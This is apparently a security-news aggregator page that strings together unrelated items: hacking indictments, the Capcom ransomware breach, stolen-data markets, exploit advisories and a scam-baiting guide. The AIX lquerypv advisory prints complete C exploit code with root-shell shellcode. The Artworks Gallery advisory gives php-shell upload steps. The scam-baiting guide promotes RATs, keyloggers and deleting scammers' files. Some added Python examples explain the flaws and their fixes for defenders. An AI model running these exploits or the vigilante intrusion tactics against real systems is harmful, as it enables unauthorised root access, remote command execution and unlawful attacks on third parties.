Wednesday, January 15, 2025

Chinese and Malaysian hackers charged by US over attacks


The US Department of Justice (DoJ) has charged five Chinese and two Malaysian men with hacking more than 100 companies.

The two Malaysian businessmen “conspired” with two of the Chinese hackers to target the video games industry in particular, the DoJ said.

They would obtain in-game items and currencies by fraud, hacking or other means, and sell on the digital items for real money, it added.

Both Malaysian men have been arrested.

The five Chinese men were “fugitives” in China, the DoJ added. The US does not have an extradition treaty with China.

The other three Chinese hackers targeted software developers, computer makers, social media companies and others, the indictment said.

Game over

Two of the Chinese hackers – named as Zhang Haoran and Tan Dailin, both 35 – supplemented their attacks on technology firms with hacking video game companies.

It is alleged that the two Malaysian men – Wong Ong Hua, 46, and Ling Yang Ching, 32 – worked with the Chinese hackers to attack the video game firms in the US, France, Japan, Singapore, and South Korea.

“Several of the Chinese defendants compromised the networks of video game companies worldwide. That’s a billion-dollar industry. And defrauded them of game resources,” Deputy Attorney General Jeffrey Rosen told reporters.

“Two of the Chinese defendants stand accused with two of the Malaysian defendants of selling those resources on the black market through their illicit website.”

Deputy Attorney General Jeffrey Rosen in front of a Department of Justice backdrop

At least nine known victim video game firms are listed in the indictment, but none are identified by name. Several are multinational firms, and at least one had multiple sub-companies.

Offensive attacks

Another of the indictments covered crimes including identity theft and money laundering by three of the Chinese men, which the DoJ said had affected more than 100 companies.

It said that Jiang Lizhi, 35, Qian Chuan, 39, and Fu Qiang, 37, worked as senior managers for a Chinese network security company.

But they also used their skills for “offensive” operations, it added.

The companies were located worldwide – not only in the US but also Australia, Brazil, Chile, India, Japan, Singapore, and elsewhere.

Microsoft, as well as Google, Facebook and Verizon all aided officials in the investigation and in cutting off the attack methods, the US government said.

Mr Rosen also blamed the Chinese state for allowing such activity to happen.

“The Department of Justice has used every tool available to disrupt the illegal computer intrusions and cyber-attacks by these Chinese citizens,” he said.

“Regrettably, the Chinese Communist Party has chosen a different path of making China safe for cybercriminals so long as they attack computers outside China and steal intellectual property helpful to China.”


Capcom hack: Up to 350,000 people’s information stolen


Video-game-maker Capcom has warned a ransomware attack might have compromised gamers’ personal information.

Up to 350,000 people could be affected, it said, and some of its own financial information had been stolen.

The Japanese developer is best known for franchises such as Resident Evil, Street Fighter, and Monster Hunter.

A week-and-a-half earlier, it had said there was no indication customer information had been accessed.

Digitally scrambled

But in an update on Monday, Capcom confirmed its servers had been hit by an attack on 2 November.

Ransomware is malicious software that typically threatens to block a victim’s access to their own records unless a blackmail payment is made.

In this case, the attackers digitally scrambled some of the data on Capcom’s servers, making it impossible to view or amend, and destroyed some files outright.

The Ragnar Locker hacker group had then demanded to be paid to undo the encryption involved, Capcom said.

On Ragnar Locker’s dark-net webpage, the hackers didn’t just post Capcom’s data but also an ominous message.

In broken English they wrote the Japanese company didn’t “make a right decision and save data from leakage”.

This – and the fact Capcom is openly talking about the hack – suggests the company chose not to pay the cyber-criminals’ extortion demand.

Many, including law enforcement, would actually see this as absolutely the right decision.

For 18 months, police the world over have been desperately imploring ransomware victims not to pay hackers.

The groups have made millions from companies, which often feel they have no other option but to fork out.

But it seems Capcom has found a way through without yielding.

No doubt the incident has affected the firm’s reputation and some sensitive data is already surfacing online.

But reading the disappointment in Ragnar Locker’s statement is refreshing and rare.

So far, Capcom has confirmed only nine people’s personal information was definitely compromised, all current or former employees.

But up to 350,000 customers, business partners, and other employees might also be affected, it said.

Although, it could not be sure because its own logs had been “lost as a result of the attack”.

The information includes different combinations of names, addresses, birthdays, phone numbers and email addresses, depending on why the data was gathered.

For example, some was from Japanese customer support and some from the American Capcom store or e-sports operation.

‘Deepest apologies’

“None of the at-risk data contains credit-card information,” Capcom’s statement said.

“All online transactions… are handled by a third-party service provider.

“And as such, Capcom does not maintain any such information internally.”

The company also said it was safe for gamers to continue to play its games online and to use its websites.

Police have been notified, as have the Japanese and UK data-protection watchdogs.

“Capcom would once again like to reiterate its deepest apologies for any complications or concerns caused by this incident,” it said.

“As a company that handles digital content, it is regarding this incident with the utmost seriousness.”


Artworks Gallery Exploit 1.0 Shell Upload Vulnerability


Artworks Gallery Exploit – Arbitrary File Upload – RCE (Authenticated)

CVE-2020-28688

[Security Risk Critical] [PHP Web Apps]

The add artwork functionality in ARTWORKS GALLERY IN PHP, CSS, JAVASCRIPT, AND MYSQL 1.0 allows remote attackers to upload arbitrary files.

*Artworks Gallery - Arbitrary File Upload - RCE (Authenticated) - Edit Profile*
 
# Exploit Title: Artworks Gallery - Arbitrary File Upload - RCE (Authenticated) - Edit Profile
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: ARTWORKS GALLERY IN PHP, CSS, JAVASCRIPT, AND MYSQL (https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf)
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28687
-----------------------------------------------------------------------------------------------------------
*Proof of Concept:*
-----------------------------------------------------------------------------------------------------------
1. Authenticate as a user (or signup as an artist)
2. Go to edit profile
3. Upload a php-shell as profile picture and click update/save
4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution
 
 
----------
 
*Artworks Gallery - Arbitrary File Upload - RCE (Authenticated) - Add Artwork*
 
# Exploit Title: Artworks Gallery - Arbitrary File Upload - RCE (Authenticated) - Add Artwork
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: ARTWORKS GALLERY IN PHP, CSS, JAVASCRIPT, AND MYSQL (https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf)
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28688
-----------------------------------------------------------------------------------------------------------
Proof of Concept:
-----------------------------------------------------------------------------------------------------------
1. Authenticate as a user (or signup as an artist)
2. Click the drop down for your username and go to My ART+BAY
3. Click on My Artworks > My Available Artworks > Add an Artwork
4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload
5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution
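Both proofs of concept above (edit profile and add artwork) hinge on the same defect: the application stores whatever the browser sends, under the name the browser chose, inside a directory the web server executes scripts from. The following Python is an added illustration of that defect class and its fix, not code from the Artworks Gallery project (which is PHP); the directory name, the `save_upload_*` function names and the placeholder upload bodies are constructed for the example. The hardened handler ignores the client file name, allow-lists image types by their leading bytes, rejects script tags hidden inside an otherwise valid image, and stores the file under a random name.

```python
import os
import secrets
import tempfile

# Image types accepted by content (leading bytes), never by the client-supplied name.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024


class RejectedUpload(ValueError):
    """Raised by the hardened handler when an upload fails validation."""


def save_upload_vulnerable(upload_dir, client_filename, data):
    """The advisory's defect class: the client-chosen name is joined onto a
    web-served directory and written as-is, so 'shell.php' lands where the
    server will execute it (hypothetical handler, constructed for the example)."""
    path = os.path.join(upload_dir, client_filename)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def sniff_image_type(data):
    """Return 'png', 'jpg' or 'gif' from the leading bytes, or None."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def save_upload_hardened(upload_dir, client_filename, data):
    """Ignore the client name entirely: size cap, content sniff against an
    allow-list, reject PHP open tags even behind a valid image header (a
    polyglot), then store under a random name with the sniffed extension.
    The directory must also be configured so the server never executes
    scripts from it; that is server configuration, outside this code."""
    if len(data) > MAX_UPLOAD_BYTES:
        raise RejectedUpload("upload exceeds size limit")
    ext = sniff_image_type(data)
    if ext is None:
        raise RejectedUpload("content is not an allowed image type")
    if b"<?php" in data or b"<?=" in data or b"<script" in data.lower():
        raise RejectedUpload("script content embedded in image")
    name = "%s.%s" % (secrets.token_hex(16), ext)
    path = os.path.join(upload_dir, name)
    # O_EXCL: never overwrite an existing file, even on a token collision.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def run_demo():
    """Exercise both handlers with constructed inputs in a temporary directory."""
    upload_dir = tempfile.mkdtemp(prefix="pictures_profile_")
    # Constructed stand-in for an uploaded script body (not a working shell).
    script_body = b"<?php echo 'constructed placeholder'; ?>"
    png_body = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    polyglot = png_body + b"<?php echo 'constructed placeholder'; ?>"
    result = {}
    result["vulnerable_saved_as"] = os.path.basename(
        save_upload_vulnerable(upload_dir, "shell.php", script_body))
    for label, body in (("script", script_body), ("polyglot", polyglot)):
        try:
            save_upload_hardened(upload_dir, "shell.php", body)
            result[label] = "accepted"
        except RejectedUpload as exc:
            result[label] = "rejected: %s" % exc
    saved = save_upload_hardened(upload_dir, "shell.php", png_body)
    result["image_saved_as_ext"] = os.path.splitext(saved)[1]
    result["image_kept_client_name"] = os.path.basename(saved) == "shell.php"
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

Running the block shows the vulnerable handler writing `shell.php` verbatim, while the hardened one rejects both the bare script and the PNG/PHP polyglot and stores the genuine image under a random `.png` name. Content sniffing alone is not sufficient (hence the explicit tag check), and neither replaces serving the upload directory with script execution disabled.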


Cyber-crime Moves to the Cloud to Accelerate Attacks Amid Data Glut


A report on the underground economy finds that malicious actors are offering cloud-based troves of stolen data, accessible with handy tools to slice and dice what’s on offer.

Cybercriminals are embracing cloud-based services and technologies in order to accelerate their attacks on organizations and better monetize their wares, researchers have found. This is largely driven by cybercriminals who sell access to what they call “clouds of logs,” which are caches of stolen credentials and other data hosted in the cloud.

The cloud-based approach makes the information more easily available to interested buyers, who then turn around and use the data to conduct secondary attacks, according to Trend Micro. Malicious actors are offering “cloud-based tools [to buyers] for analyzing and extracting the data that they need to conduct [these] further malicious activities,” explained the firm in a Monday posting, which characterized the development as a relatively new approach.

The move to the cloud for cybercriminals has the same main benefit as it does for legitimate organizations: Speed. Trend Micro said that the time between an initial data heist to that stolen information being used against an enterprise has decreased from weeks to days or even hours when the cloud approach is taken.

“With the introduction of cloud-based services and technologies, criminals are equipped to steal, purchase and use data to conduct their attacks much faster when targeting organizations,” researchers said, using the analogy of the time it takes someone to buy their tools at a garage sale versus buying them from an online shopping site.

And with faster transactions in play, “organizations would not be able to anticipate the arrival and speedy execution of such attacks — ones enabled by stolen data and orchestrated by criminals with only a short amount of time, leaving them with less time to detect and respond.”

A Big Data Problem

Malicious actors are turning to the cloud in order to work more effectively with the sheer volume of data on offer in underground forums, researchers said. By Trend Micro’s estimation, the caches represent multiple terabytes-worth of data.

“In recent years, the theft of user credentials has been on the rise, with attackers collecting massive amounts of credentials and associated email addresses or domain names,” researchers explained. “[Other data stolen] often includes recorded keystrokes, authentication credentials to online portals, online banks, authenticated session attributes, personally identifiable information (PII), scans of documents, tax reports, invoices, bank account payment details (for example, credit cards), and more.”

Exacerbating the situation is the fact that data exfiltration has become de rigueur for almost any type of attack, including ransomware, botnets, keyloggers, exploit kits and other malicious components.

“In addition to what was previously mentioned, this collected information might contain browsing history, cookies, keystrokes, user credentials, authentication tokens, information about the victim environment that can be used to evade anti-fraud systems, and more,” researchers said.

All of this means that cybercriminals have a Big Data problem – again, just like legitimate organizations. It’s hard to exploit the full potential of such a colossal amount of data without tools for slicing and dicing it.

This has paved the way for a pay-for-access business model that allows cybercriminals to better monetize their ill-gotten goods while enabling other attackers to easily identify the data that they will need from sellers’ clouds of logs for their attacks.

Pay-for-Access in the Cloud Economy

Customers pay to access the “clouds of logs” using helpful cloud tools at varying price ranges, Trend Micro found.

Packages that only allow limited access and downloads are in the hundred-dollar range. Monthly subscription rates are also offered, with some cybercriminals pricing them within the $300 to $1,000 per-month range.

“[One actor] claims to update their dataset with new stolen accounts on a weekly basis,” according to the firm. “The service offers a premium subscription for $300 for the first four customers, while further access is priced at $1,000.”

In another instance, an advertisement of a service guarantees updates of new batches of data ranging from 20,000 to 30,000 logs every one to two weeks. A monthly subscription costs $1,000, while a semiannual subscription costs $5,000.

The data can be separated by country or region, data type, whether or not the logs have been used before in other campaigns, victim organization name or sector, and other parameters.

“Criminals only need to search for the data that they need in order to find an opportunity to commit a crime faster; after all, they won’t have to do the task of obtaining data by themselves anymore,” the firm explained.

Criminals who buy access to these datasets also vary in their specializations, according to Trend Micro.

“Some of these criminals primarily focus on carding activities, while others specialize in attacking financial institutions and seek banking credentials,” according to the report. “Credentials for accessing cloud platform portals are also sold to those criminals who specialize in selling bulletproof-dedicated services. Such credentials could be used to spawn instances of virtual machines that are then sold in underground markets.”

As discussed earlier, many sellers also limit the number of people who can access and buy logs. They also implement data watermarking and other tracking methods to enforce their service-level agreements (SLA).

“Among these restrictions are fixed quotes on the total number of accessed objects per day, a restriction on the number of files permitted for download, or the implementation of traffic-shaping policies,” according to Trend Micro. “Other platforms also restrict access to the cloud to one device per account. Some also require private VPN credentials to initiate access to the service.”

Future is Cloudy

With the growing business of selling access to clouds of logs, various monetization schemes could arise in the future, according to Trend Micro.

“For instance, cybercriminals could look for records of authenticated user sessions to cloud portals,” the firm explained. “If a malicious actor hijacks an active console session from a cloud service provider, they could have full control of the victim’s cloud resources. This could mean gaining access to existing cloud systems and storage. The actors could then sniff valuable data from these resources, which they could in turn exfiltrate and sell in the underground.”

Researchers also foresee malicious actors developing tools powered by machine learning (ML) to speed up data extraction and analysis processes.

“Although we have only seen tools with limited capacities as of writing, we believe that the development of ML-powered tools — ones that can scale much larger datasets at a faster rate — is the next logical step for criminals as the market matures,” the report concluded.


Facebook Data Haul of 13 Million Records Exposed By Sloppy Hackers


Security researchers have uncovered a major Facebook scam exploiting hundreds of thousands of users, after the scammers left an Elasticsearch server unsecured.

Among the 5.5GB haul discovered by vpnMentor on September 21, was 150,000-200,000 Facebook usernames and passwords, and personal info including emails, names and phone numbers for hundreds of thousands who had fallen victim to a Bitcoin scam.

The two datasets are part of the same operation: the first group were tricked into handing over their account log-ins by a fake app promising to reveal who had recently visited their profile. With these log-ins, the scammers hijacked the victims’ accounts and posted comments on their Facebook posts, with links directing individuals to a Bitcoin fraud scheme.

In total, the exposed database contained 13.5 million records, also including domains used in the scheme and text outlines related to the Facebook comments the fraudsters would post.

Although the data came from a relatively short window, June-September 2020, there are fears the scheme may have originally been much bigger. At the time it was registered by Shodan, the database contained 11GB of data relating to the scheme, rather than 5.5GB, meaning many more victims may have been affected.

The database was then wiped by the Meow attack the day after vpnMentor discovered it. New data immediately started to appear again before those in charge finally secured the server.

With access to users’ Facebook accounts, the cyber-criminals behind this campaign have a highly monetizable resource for posting malicious links to scams, launching follow-on phishing or identity fraud attempts, blackmail and credential stuffing of other accounts, vpnMentor warned.

“If you’re a Facebook user and think you’ve been a victim of this fraud, change your login credentials immediately. Furthermore, if you reused your Facebook password on any other accounts, change it immediately to protect them from hacking,” the firm said.

“We recommend using a password generator to create unique, strong passwords for every private account you have, and changing them periodically. Never provide usernames and passwords for Facebook, email or financial accounts to external websites.”


Crypto Firm Akropolis Offers $200,000 Bug Bounty to Hacker Who Stole $2m


$2m in funds was stolen from Akropolis last week. Akropolis has since offered a bug bounty to the hacker who stole the cryptocurrency.

Gibraltar-based Akropolis was attacked on Thursday, when an individual exploited a bug in the deposit logic of its SavingsModule smart contract to make off with a little over two million in DAI virtual currency.

However, the firm’s security company PeckShield claimed to have located the attacker’s Ethereum account, where the funds were transferred to, and said it is monitoring it for any further movement.

This could make it more challenging for the attacker to launder those funds, which might be why Akropolis published an open letter to them over the weekend.

“We have not contacted any form of law enforcement to pursue a criminal investigation. We would like to propose that you return the funds of our community members within 48 hours and in return we will offer a $200,000 USD bug bounty. We will take measures to protect your identity as required,” it said.

“If you decide not to co-operate we will pursue criminal action and contact law enforcement. We hope that we can work together towards a resolution, thank you for your time.”

In the meantime, Akropolis said it has fixed the issue at a contract level, performed an internal investigation with auditors and an external one with investors and exchange partners.

An attack on another decentralized finance (DeFi) protocol firm, Harvest Finance, at the end of October led to the theft of $24m. On that occasion the firm offered a $100,000 reward for the first person to contact the attacker and help them return the funds.


AIX 5.3L /usr/sbin/lquerypv local root privilege escalation


[Security Risk Critical] [local exploits] [AIX] [verified]

AIX 5.3L /usr/sbin/lquerypv Local Root Privilege Escalation Exploit

AIX 5.3L includes a setuid root binary "lquerypv" which contains a stack-based overflow in the handling of the -V command line argument. However, prior to the vulnerability being triggered the binary drops privileges. On AIX you can restore the dropped privileges using seteuid(), which results in a local root LPE vulnerability.
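The root cause described above is that the binary "drops" privileges with seteuid(), which changes only the effective uid and leaves the saved set-user-ID at 0, so a later seteuid(0) is permitted and root comes back. The Python below is an added illustration, not part of the Hacker Fantastic advisory or the exploit: it models that uid arithmetic on (real, effective, saved) triples, using the uid 202 from the advisory's session transcript, and shows the irreversible drop (all three ids set together with setresuid(), then read back and verified) that closes the window. The function names are the example's own.

```python
import os


def root_reachable(ruid, euid, suid):
    """A process can regain an effective uid of 0 whenever any of its real,
    effective or saved set-user-IDs is 0: seteuid(0) is permitted when the
    saved uid is 0. That is the state a seteuid()-only drop leaves behind."""
    return 0 in (ruid, euid, suid)


def model_seteuid(triple, new_euid):
    """seteuid() changes only the effective uid; real and saved stay put."""
    ruid, _euid, suid = triple
    return (ruid, new_euid, suid)


def analyse_seteuid_style_drop(invoker_uid):
    """Walk the uid triple through the sequence in the advisory as plain
    tuple arithmetic: setuid-root start, seteuid() 'drop', seteuid(0)."""
    start = (invoker_uid, 0, 0)  # setuid-root binary started by invoker_uid
    dropped = model_seteuid(start, invoker_uid)
    reachable = root_reachable(*dropped)
    regained = model_seteuid(dropped, 0) if reachable else dropped
    return {
        "start": start,
        "after_seteuid_drop": dropped,
        "root_reachable_after_drop": reachable,
        "after_seteuid_0": regained,
    }


def drop_privileges_permanently(target_uid):
    """Irreversible drop for a process running as root: set real, effective
    and saved uids together, then verify by reading them back. A real daemon
    also calls setgroups() and setresgid() first; omitted here for brevity."""
    if hasattr(os, "setresuid"):
        os.setresuid(target_uid, target_uid, target_uid)
    else:
        os.setuid(target_uid)  # with an effective uid of 0 this also sets all three
    if hasattr(os, "getresuid"):
        triple = os.getresuid()
    else:
        triple = (os.getuid(), os.geteuid(), os.geteuid())
    if target_uid != 0 and root_reachable(*triple):
        raise RuntimeError("privilege drop incomplete: uids %r" % (triple,))
    return triple


def drop_to_current_uid():
    """Self-test helper: dropping to the uid we already run as is always
    permitted, so the verification path can be exercised unprivileged."""
    return drop_privileges_permanently(os.getuid())


if __name__ == "__main__":
    for key, value in analyse_seteuid_style_drop(202).items():
        print(key, "->", value)
    print("real drop verified as", drop_to_current_uid())
```

The model reproduces the transcript in the advisory: after the seteuid()-style drop the triple is (202, 202, 0), root is still reachable, and seteuid(0) yields uid=202 with euid=0. A drop that sets all three ids to 202 leaves nothing for seteuid(0) to fall back on, and reading the ids back after the call is the check a setuid program should make before parsing untrusted input.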

/*AIX 5.3L /usr/sbin/lquerypv local root privilege escalation 
* ===========================================================
* AIX5.3L includes a setuid root binary "lquerypv" which contains a stack-based
* overflow in the handling of -V command line argument. However, prior to the 
* vulnerability being triggered the binary drops privileges. On AIX you can 
* restore the dropped privileges using seteuid() which results in a local root
* LPE vulnerability.
* 
* e.g
* bash-4.4$ ls -al `which lquerypv`;id;uname -a;oslevel
* -r-sr-xr-x   1 root     system        27160 Apr 28 2006  /usr/sbin/lquerypv
* uid=202(user) gid=1(staff)
* AIX aix53l 3 5 000772244C00
* 5.3.0.0
* bash-4.4$ ./aix53l-lquerypv
* [ AIX 5.3L /usr/sbin/lquerypv local root privilege escalation exploit
* # id
* uid=202(user) gid=1(staff) euid=0(root)
*
* -- Hacker Fantastic 
* (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
#include <unistd.h>
 
char shellcode[]="\x7f\xff\xfb\x78" /* mr      r31,r31 (nop)          */
                 "\x7c\x84\x22\x78" /* xor     r4,r4,r4         */
                 "\x7e\x94\xa2\x79" /* xor.    r20,r20,r20            */
                 "\x40\x82\xff\xfd" /* bnel    (setreuidcode)         */
                 "\x7e\xa8\x02\xa6" /* mflr    r21                    */
                 "\x3a\xb5\x01\x40" /* cal     r21,0x140(r21)         */
                 "\x88\x55\xfe\xe0" /* lbz     r2,-288(r21)           */
                 "\x7e\x83\xa3\x78" /* mr      r3,r20                 */
                 "\x3a\xd5\xfe\xe4" /* cal     r22,-284(r21)          */
                 "\x7e\xc8\x03\xa6" /* mtlr    r22                    */
                 "\x4c\xc6\x33\x42" /* crorc   cr6,cr6,cr6            */
                 "\x44\xff\xff\x02" /* svca                           */
                 "\xaa\x06\xff\xff" /* 0xaa = seteuid 0x06 = execve   */
                 "\x38\x75\xff\x04" /* cal     r3,-252(r21)           */
                 "\x38\x95\xff\x0c" /* cal     r4,-244(r21)           */
                 "\x7e\x85\xa3\x78" /* mr      r5,r20                 */
                 "\x90\x75\xff\x0c" /* st      r3,-244(r21)           */
                 "\x92\x95\xff\x10" /* st      r20,-240(r21)          */
                 "\x88\x55\xfe\xe1" /* lbz     r2,-287(r21)           */
                 "\x9a\x95\xff\x0b" /* stb     r20,-245(r21)          */
                 "\x4b\xff\xff\xd8" /* bl      (setreuidcode+32)      */
                 "/bin/sh";
 
int main(int argc,char* argv[]){
        char *env[] = {NULL};
        char *buffer = malloc(2048);
        long ptr;
        char *argp[] = {"lquerypv","-V",buffer,NULL};
        setreuid(0,0);
        if(!buffer){
                printf("[ malloc() failure\n");
                exit(-1);
        }
        printf("[ AIX 5.3L /usr/sbin/lquerypv local root privilege escalation exploit\n");
        memset(buffer,0,2048);
        memset(buffer,'\x90',1044);
        ptr = (long)buffer + 1043;
        memcpy((void*)ptr,"\x2f\xf2\x2b\x54",4); //0x2ff22b54
        memcpy(buffer,(void*)&shellcode,strlen((char*)&shellcode));
        execve("/usr/sbin/lquerypv",argp,env);
}
 

Scam Baiting (Scum-baiting) with a Windows 10 Host using Oracle’s vBox


How to Scam Bait ( Scum Baiting )

Contents:

  • A: What is scam-baiting ?
  • B: How do I set up a scam-baiting environment with VirtualBox?
    • Installing VirtualBox
    • Creating a new Virtual Machine
    • Installing Windows 10
  • C1: Disguising your Virtual Machine
  • C2: Further Disguising
  • D: Further Scam Baiting tools
  • E/F: Some Scam Baiting YouTubers/Suggestions and resources

A: What is scam-baiting?

Scam-baiting is the art of wasting a scammer’s time in order to prevent real people from being affected by the scammer. Scam-baiting may also extend to more serious actions such as deleting files, locking scammers out of their computer, gathering information on scammers and more. Whilst these further activities are illegal, the chances of being raided by the police for messing with fraudulent scammers are pretty slim. However, it is still advised to take basic anonymity precautions.

B: How do I set up a scam-baiting environment with VirtualBox?

Setting up a scam-baiting environment is not as hard as some people may think. Here is a full guide on how to do just that:

Installing VirtualBox:

Firstly, you’ll need to install VirtualBox. It is recommended that you use the latest version. To do this, download VirtualBox here.

After the file has been downloaded, install the file like how you would normally install the software (e.g. Windows uses its installer wizard). After installing VirtualBox, run it. You should come across a screen that looks like this:


Creating a new Virtual Machine:

When creating a new Windows 10 Virtual Machine, some users may find it hard to set it up correctly, even after downloading their Windows 10 ISO file – the same thing happened to me. However, now that I have the knowledge, it’s actually incredibly easy, it’s just that most first-time users wouldn’t think of doing it. So, here is how to set up your Windows 10 Virtual Machine!

  • Download the Windows 10 ISO file.
  • Head to the main screen of the VirtualBox application and click the blue New button.
  • Name the Virtual Machine whatever you want and select its type as Microsoft Windows and its version as Windows 10 (64-bit).
  • Allocate the machine however much RAM you want (Personally, I use 4 GB of RAM for my VMs, but you can use down to 2 GB).
  • Ensure the following is selected
    • “Create a virtual hard disk now,” and click next.
    • “VDI (VirtualBox Disk Image),” and then click next.
    • “Dynamically allocated,” and click next.
  • Give the machine a reasonable amount of space (Enough for the OS’ files and your own usage).
  • After creating the machine, highlight the machine by clicking it once, then click the orange Settings button.
  • Head to the Storage section via the left panel.
  • You should see a disc icon that says, “Empty”. Click this to highlight it.
  • After highlighting the disc, on the right panel there should be a label that reads, “Attributes”. Underneath this label you should see another label that reads, “Optical Drive:” along with a drop down menu beside it. Next to the drop down menu, click the small blue disc icon, then select, “Choose Virtual Optical Disk File”.
  • Select the Windows 10 ISO file that you downloaded earlier. After selecting the ISO file, press OK to close the Settings window.
  • Highlight the Virtual Machine you just created and click the green Start button. From there, the machine will power on and begin installing Windows 10.

Installing Windows 10:

Before installing Windows 10 for your scam-baiting, there are some important considerations you should take note of…

  • When Windows 10 asks for an activation key, click the option to activate Windows 10 later (Which, of course, you won’t).
  • Install Windows 10 Pro; it will give you access to regedit.
  • Never use your real information. When Windows 10 asks for your Microsoft account’s e-mail, choose the option to make a brand new outlook account. Furthermore, when Windows 10 asks you for its back-up account, you may want to use a random throwaway e-mail as well (For example, my throwaway email is cle************@protonmail.com); my real name does not begin with, “cle”.
  • Refuse all offers/services. This includes finding your device, knowing your location, using your voice, etc.
  • When setting your account’s password, do not make it a password you use for your host machine or any services you use.

C1: Disguising your Scam Baiting Virtual Machine.

The following guide is based upon this video by UncleUdink.

One of the most important things to do with a Virtual Machine is to hide the fact that it is a Virtual Machine from scammers. Most scammers nowadays will check to see if the machine that they are connected to is a Virtual Machine or not to see if they are being baited and – if they find out it is a Virtual Machine, will usually disconnect and hang up. You can disguise a Oracle Virtual Machine by doing the following:

  • Download the vBoxSysInfoMod tool (If you have a GitHub account, as well as starring this page, remember to star the official vBoxSysInfoMod page). Then, run the vBox System Info Mod.bat file and follow the instructions in the terminal (For system manufacturer, you can use Dell – for system model, you can use any Dell Model (e.g. Optiplex 745)). Note that you must stop your Virtual Machine if it is running to avoid corruption.
  • After this process is complete, you can take the following steps within the Virtual Machine to further hide your machine from scammers:
    • Run regedit using the run window (Win+R) and navigate the following path: HKEY_LOCAL_MACHINE ➡️ SOFTWARE ➡️ Microsoft ➡️ Windows ➡️ CurrentVersion ➡️ Uninstall. Within this path, you should see a folder named, “Oracle VM VirtualBox Additions”. Delete this folder, as it will prevent the scammer viewing it in appwiz.cpl (If the folder does not exist, you have no need to worry!).
    • Following this, you then want to navigate to the following path: HKEY_LOCAL_MACHINE ➡️ SYSTEM ➡️ ControlSet001.
    • Within this path, you should see a folder named, “Enum”. Right click the folder and click, “Permissions”. Then, click the, “Add” button and enter your Virtual Machine’s username in the text box. After entering the username, click the, “Check Names” button then click OK. Finally, go to the option you just added and check, “Allow full control” then click, “Apply”.
    • From here, click the, “Advanced” button. At the top of the pop-up, click the, “Change” link and, again, enter your Virtual Machine’s username into the text box, then click, “Check Names” then click OK. Then, click, “Apply”.
    • Next, re-open the Advanced menu and check the, “Replace all child object…” check box. Then, click, “Apply” again and OK (Do not be alarmed at the checkbox becoming unchecked after applying).
    • Here is the tedious part. Right click the, “Enum” folder and click find. From there, enter the following device-class GUID: 4d36e967-e325-11ce-bfc1-08002be10318 and click, “Find Next”. Now, right click the, “FriendlyName” option, click, “Modify” and change the value to, “Samsung 50 GB ATA”.
    • Next, right click the, “Enum” folder again and click find. Enter the following GUID: 4d36e968-e325-11ce-bfc1-08002be10318 and modify the “DeviceDesc” to, “Nvidia GeForce GTX 1080”.
    • Next, right click the, “Enum” folder again and click find. Enter the following GUID: 4d36e965-e325-11ce-bfc1-08002be10318 and modify the, “FriendlyName” to, “NEC DVD-RW SATA DVD01”.
    • Finally, right click the, “Enum” folder again and click find. Enter the following GUID: 4d36e96f-e325-11ce-bfc1-08002be10318 and modify the, “DeviceDesc” to, “Microsoft Pointing Device”. Now press F3 twice and modify the next, “DeviceDesc” to, “Microsoft USB Pointing Device”.

C2: Further disguising:

So, you’ve changed all the complicated settings, good job! (WARNING: if you are using VirtualBox Guest Additions, close the tray icons using Task Manager, then disable Task Manager and blame it on a virus. Also eject the Guest Additions CD from the D: drive.)

However, a fresh PC is going to look suspicious, so remember to use Ninite to install some applications in the Virtual Machine (Download the files to your Virtual Machine, not your host).

Furthermore, you will also want a custom desktop background. There is an easy way to do this without an activation key. Simply download a picture from the internet onto your desktop, then move it into the Windows 10 folder at C:\Windows\Web\Wallpaper\Windows 10. After this, right-click the image and click “Set as desktop background”. Note that you cannot adjust the crop this way, so choose an image that roughly fits the Virtual Machine’s resolution.

Before saving a screenshot of your Virtual Machine, check you have done the following:

  1. Edited the Virtual Machine using the vmSysInfoMod tool.
  2. Removed the Guest Additions key from the registry if using Guest Additions.
  3. Edited the registry values for each of the four device class GUIDs.
  4. Installed some applications to make yourself appear innocent.
  5. Changed the desktop background to match the pretend-victim’s personality.
  6. Removed the Guest Additions tray icons using Task Manager if using Guest Additions.
  7. Disabled Task Manager after this if using Guest Additions.

If all of these requirements are met, save a screenshot of the machine.

This is done from the top menu of the VirtualBox window: Machine -> Take Snapshot. Then, every time you finish a scam bait, tick the “Restore current snapshot” check box when powering off the machine to revert to this finished set-up state.


D: Further scam-baiting tools.

  • Google Hangouts, BobRTC, TextNow and Telegram are all good, free alternatives to FireRTC, which is essentially dead.
  • You can use a RAT creator (at your own risk!) together with port forwarding to get access to a scammer’s computer outside the VM; the VM then only serves as the place where the scammer downloads and runs the file.
  • You can use a fake-name generator to give yourself a consistent set of fake details.

E: Find scammers fast (How to find scammers)

F: Some scam-baiting YouTubers:

Scam baiting
Scambaiting (or scam baiting) is a form of Internet vigilantism primarily used towards advance-fee fraud, IRS impersonation scam, technical support scams

ORIGINAL ARTICLE: https://github.com/Catterall/Scambaiting-Setup & UncleUdink.

The Top Ten Best Scambaiting Hacks & Tools

1. WINSPY KEYLOGGER
2. VIRUS SCRIPTS
3. VIRTUAL MACHINE
